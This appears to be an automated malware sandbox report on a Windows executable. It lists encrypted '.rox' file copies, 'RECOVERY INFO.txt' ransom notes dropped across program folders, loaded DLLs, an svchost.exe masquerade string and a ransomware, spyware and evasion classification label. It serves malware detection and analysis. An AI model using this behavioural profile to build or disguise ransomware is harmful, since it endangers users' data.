Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99926664607	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99397041016	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99772938556	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.99785272493	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99705862036	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal entropy: 7.99984929044	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99532813021	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99871451912	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\70K_VXHc5sjoBPg97hL1pHJ7wo4.br[1].js entropy: 7.99953706637	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99886119232	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js entropy: 7.99859672177	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\F7QNLlcY2ODqtyZ0GIv9h7Cm5Yw.br[1].js entropy: 7.99931719268	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\dYw9trBOUuy7sL9xTZGIliMEagg[1].css entropy: 7.99936992218	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js entropy: 7.99898678992	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\EJz06avERkAqfuwcXY6H5w8dtNc[1].css entropy: 7.99952233383	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\H3gIahXaXkGgvztu9ouLmJNXhQM.br[1].js entropy: 7.99887976622	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\Init[1].htm entropy: 7.99845696162	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\Fz9exwO1sXH1v6MZmMHhkkwLSN4.br[1].js entropy: 7.99674184217	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\gYsYMd3hJLlkm0pWl7CInhg245Y.br[1].js entropy: 7.99672418308	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\JClcsxanpxBiLGzKZtauWAccdA0.br[1].js entropy: 7.99558705817	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\k0oGmqG3Bk5KfPcZl898MPlQ1rI.br[1].js entropy: 7.99964478776	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js entropy: 7.99989878946	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe entropy: 7.99589014366	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe entropy: 7.99503499012	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples entropy: 7.99543807246	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Extras entropy: 7.99479461956	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt v3 Website_url entropy: 7.99471350556	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe entropy: 7.99526880594	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe entropy: 7.99469542739	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_AutoItX_chm entropy: 7.99514176801	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm entropy: 7.99542456704	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe entropy: 7.99575141499	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe entropy: 7.99502715647	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{F38BF404-1D43-42F2-9305-67DE0B28FC23}_regedit_exe entropy: 7.99487475903	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe entropy: 7.99503807702	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe entropy: 7.99485440166	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Java_jre-1_8_bin_javacpl_exe entropy: 7.99536958349	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.index entropy: 7.99982443547	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\0.0.filtertrie.intermediate.txt entropy: 7.99383324575	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\0.0.filtertrie.intermediate.txt entropy: 7.99579343296	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.ft entropy: 7.99606444169	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\0.0.filtertrie.intermediate.txt entropy: 7.99467277153	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\Apps.ft entropy: 7.99592141592	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\Apps.index entropy: 7.99983697505	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\Apps.index entropy: 7.99984754753	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt entropy: 7.99950817717	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt entropy: 7.99987487724	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\Apps.ft entropy: 7.99636602789	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt entropy: 7.99964784989	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt entropy: 7.99926720825	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt entropy: 7.99906379928	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt entropy: 7.99820171196	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\Settings.ft entropy: 7.99909400771	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.bmp.rox (copy) entropy: 7.9997140245	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user.bmp.rox (copy) entropy: 7.99969166356	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\USOPrivate\UpdateStore\store.db.rox (copy) entropy: 7.99998577804	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99112777195	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.9935856747	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99535959301	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99179545182	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.9950928826	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99252562177	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99494061925	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99687282116	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99393937985	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe.rox (copy) entropy: 7.99971298097	Jump to dropped file

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Process Stats: CPU usage > 49%

Source: 2b7cu0KwZl.exe, 00000000.00000003.1857563152.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1869988449.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1863078857.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1870471666.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1858342512.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1872606843.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1861932147.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1860944488.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1872311644.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1856630196.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1874294884.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1859699836.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1875032579.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1859378727.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1873842753.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1860367018.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1861775046.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1856172882.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1867980419.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1862687819.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1871936477.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe

Source: classification engine

Classification label: mal84.rans.spre.spyw.evad.winEXE@1/1281@1/2

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txt

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Documents and Settings\user\Local Settings\Temp\acrobat_sbx\NGL\RECOVERY INFO.txt

Jump to behavior

Source: 2b7cu0KwZl.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File read: C:\ProgramData\Microsoft OneDrive\setup\refcount.ini

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2b7cu0KwZl.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File written: C:\ProgramData\Microsoft OneDrive\setup\refcount.ini

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\RECOVERY INFO.txt	Jump to behavior
